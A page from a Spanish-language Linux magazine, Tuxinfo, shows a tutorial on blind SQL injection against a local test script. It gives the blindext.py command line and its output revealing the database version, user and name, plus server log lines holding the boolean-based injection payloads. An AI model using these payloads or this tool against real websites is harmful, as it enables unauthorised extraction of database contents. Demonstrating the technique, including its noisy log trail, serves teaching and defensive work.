Tuxinfo - Index of
Tuxinfo - Index of
Tuxinfo - Index of
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
oot@hack:~/codes# ./blindext.py --info -u "192.168.0.113/buggy.phpid=1" -s "administrator"<br />
|---------------------------------------------------------------|<br />
| rsauron[@]gmail[dot]com v3.0 |<br />
| 7/2008 blindext.py |<br />
| -Blind MySQL v5+ Information_schema Database Enumeration |<br />
| -Blind MySQL v4+ Data Extractor |<br />
| -Blind MySQL v4+ Table & Column Fuzzer |<br />
| Usage: blindext.py [options] |<br />
| -h help darkc0de.com |<br />
|---------------------------------------------------------------|<br />
[+] URL: http://192.168.0.113/buggy.phpid=1<br />
[-] Proxy Not Given<br />
[+] Gathering MySQL Server Configuration...<br />
[+] MySQL >= v5.0.0 found!<br />
[+] Showing database version, username@location, and database name!<br />
[+] 19:42:36<br />
[0]: 5.1.49-3:root@localhost:tuxinfo<br />
[-] 19:42:37<br />
[-] Total URL Requests 227<br />
[-] Done<br />
Don't forget to check blindextlog.txt<br />
Bueno, como vemos acá, sacamos la siguiente información:<br />
Ya sabemos que la base es mysql, versión 5.1.493, y que corre el usuario root, en localhost, la base de datos tuxinfo.<br />
Ya con esto, podemos seguir usando la herramienta.<br />
Todo muy lindo, pero me llenó de logs,<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),25<br />
,1))>117 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),25<br />
,1))>116 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26<br />
,1))>63 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26<br />
,1))>95 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26<br />
,1))>111 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26<br />
,1))>119 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26<br />
,1))>115 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26<br />
,1))>117 HTTP/1.1" 200 268 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),26<br />
,1))>116 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),27<br />
,1))>63 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"<br />
192.168.0.113 - - [12/Oct/2011:19:50:00 -0300] "GET<br />
/buggy.phpid=1+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),27<br />
,1))>95 HTTP/1.1" 200 432 "-" "Python-urllib/2.6"<br />
35 www.tuxinfo.com.ar